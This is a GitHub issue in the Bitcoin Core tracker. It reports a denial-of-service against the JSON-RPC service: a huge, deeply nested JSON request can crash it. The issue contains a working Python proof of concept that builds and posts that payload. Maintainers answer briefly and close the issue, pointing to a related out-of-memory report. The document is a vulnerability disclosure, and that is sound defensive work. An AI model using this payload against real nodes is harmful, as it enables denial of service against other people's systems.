A special RPC calls can leak to crash #15850

issue z3roTo0ne opened this issue on April 19, 2019

z3roTo0ne commented at 3:35 AM on April 19, 2019: none

Hi, developers, I found a bug With bitcoin client's JSON RPC service is enable, someone can send a super-large JSON request data to JSON RPC service which can leaks to DoS, It is An issue was discovered in the client in Bitcoin Core through 0.17.1, It seems to affect all versions.

And I want to apply for a CVE number

Here is the PoC

#!/usr/bin/python3  
# coding = utf-8 
# By Thinking@SlowMist
import requests
import random
from requests.auth import HTTPBasicAuth, HTTPDigestAuth
import json
headers = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
           'Accept-Charset': 'GB2312,utf-8;q=0.7,*;q=0.7',
           'Accept-Language': 'zh-cn,zh;q=0.5',
           'Cache-Control': 'max-age=0',
           'User-Agent': 'Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.14) Gecko/20110221 Ubuntu/10.10 (maverick) Firefox/3.6.14',
           'Content-Type':'application/json'}


url = 'http://xxx.xxx.xxx:8888' # replace in the RPC address and port
datas = '{"slowmist":' + '{"slowmist":' * 0xfffff + '""}' +'}'* 0xfffff
try:
    resp = requests.post(url=url, headers=headers, data=datas, auth=HTTPBasicAuth('root','root')) #  replace in the HTTPBasicAuth username and passwd
    print(resp.content)
except requests.exceptions.ConnectionError as e:
    print(e)

promag commented at 9:24 AM on April 19, 2019: member

You mean that the server fails to handle a huge request body?
MarcoFalke commented at 11:50 AM on April 19, 2019: member
Please limit your requests to a size that the server can handle. See:
- JSON RPC Batch Requests Can Consistently OOM Kill Bitcoin Process #14376
MarcoFalke closed this on Apr 19, 2019
bitcoin locked this on Dec 16, 2021

Contributors

z3roTo0ne

promag

MarcoFalke

Linked (view graph)

#14376 JSON RPC Batch Requests Can Consistently OOM Kill Bitcoin Process